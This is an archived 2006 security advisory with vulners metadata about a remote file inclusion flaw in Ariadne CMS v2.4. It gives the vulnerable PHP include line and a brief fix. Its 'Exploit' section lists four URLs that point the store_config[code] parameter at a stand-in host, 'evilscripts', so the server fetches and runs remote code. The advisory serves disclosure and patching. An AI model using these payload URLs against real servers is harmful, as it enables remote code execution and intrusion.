Ariadne v2.4 (store_config[code]) Remote File Include Vuln

2006-11-05T00:00:00

Description

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Ariadne v2.4 (store_config[code]) Remote File Include Vuln =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Found: Cyber-Security.Org =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Version: 2.4 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Code: include_once($store_config['code']."modules/mod_debug.php"); =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- F.X: 1- open files 2- add this code before wrong codes require("../www/ariadne.inc"); 3- save files =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Exploit: www.target.com/script_path/lib/includes/loader.cmd.php?store_config[code]=http://evilscripts ? www.target.com/script_path/lib/includes/loader.ftp.php?store_config[code]=http://evilscripts ? www.target.com/script_path/lib/includes/loader.soap.php?store_config[code]=http://evilscripts ? www.target.com/script_path/lib/includes/loader.web.php?store_config[code]=http://evilscripts ? =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Thanx: DJR, xoron, K@OS, trampfd, Konaksinamon, KripteX, sakkure, Seyfullah, MaSSiMo, Kano, whiteguide =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Script Download: http://www.ariadne-cms.org/download/ariadne/ariadne.2.4.zip =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

{"id": "SECURITYVULNS:DOC:14935", "bulletinFamily": "software", "title": "Ariadne v2.4 (store_config[code]) Remote File Include Vuln", "description": "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\r\n\r\nAriadne v2.4 (store_config[code]) Remote File Include Vuln\r\n\r\n=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\r\n\r\nFound: Cyber-Security.Org\r\n\r\n=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\r\n\r\nVersion: 2.4\r\n\r\n=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\r\n\r\nCode: include_once($store_config['code']."modules/mod_debug.php");\r\n\r\n=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\r\n\r\nF.X:\r\n\r\n1- open files\r\n\r\n2- add this code before wrong codes\r\n\r\nrequire("../www/ariadne.inc");\r\n\r\n3- save files\r\n\r\n=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\r\n\r\nExploit:\r\n\r\nwww.target.com/script_path/lib/includes/loader.cmd.php?store_config[code]=http://evilscripts ?\r\nwww.target.com/script_path/lib/includes/loader.ftp.php?store_config[code]=http://evilscripts ?\r\nwww.target.com/script_path/lib/includes/loader.soap.php?store_config[code]=http://evilscripts ?\r\nwww.target.com/script_path/lib/includes/loader.web.php?store_config[code]=http://evilscripts ?\r\n\r\n\r\n=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\r\n\r\nThanx: DJR, xoron, K@OS, trampfd, Konaksinamon, KripteX, sakkure, Seyfullah, MaSSiMo, Kano, whiteguide\r\n\r\n=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\r\n\r\nScript Download: http://www.ariadne-cms.org/download/ariadne/ariadne.2.4.zip\r\n\r\n=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\r\n", "published": "2006-11-05T00:00:00", "modified": "2006-11-05T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:14935", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:20", "edition": 1, "viewCount": 33, "enchantments": {"score": {"value": 0.4, "vector": "NONE"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:6782"]}], "rev": 4}, "backreferences": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:6782"]}]}, "exploitation": null, "vulnersScore": 0.4}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645630821, "score": 1659803227}, "_internal": {"score_hash": "a45b31fc805aabfc0cd470ce7862e8ef"}}

Ariadne v2.4 &#40;store_config[code]&#41; Remote File Include Vuln

Description

Ariadne v2.4 (store_config[code]) Remote File Include Vuln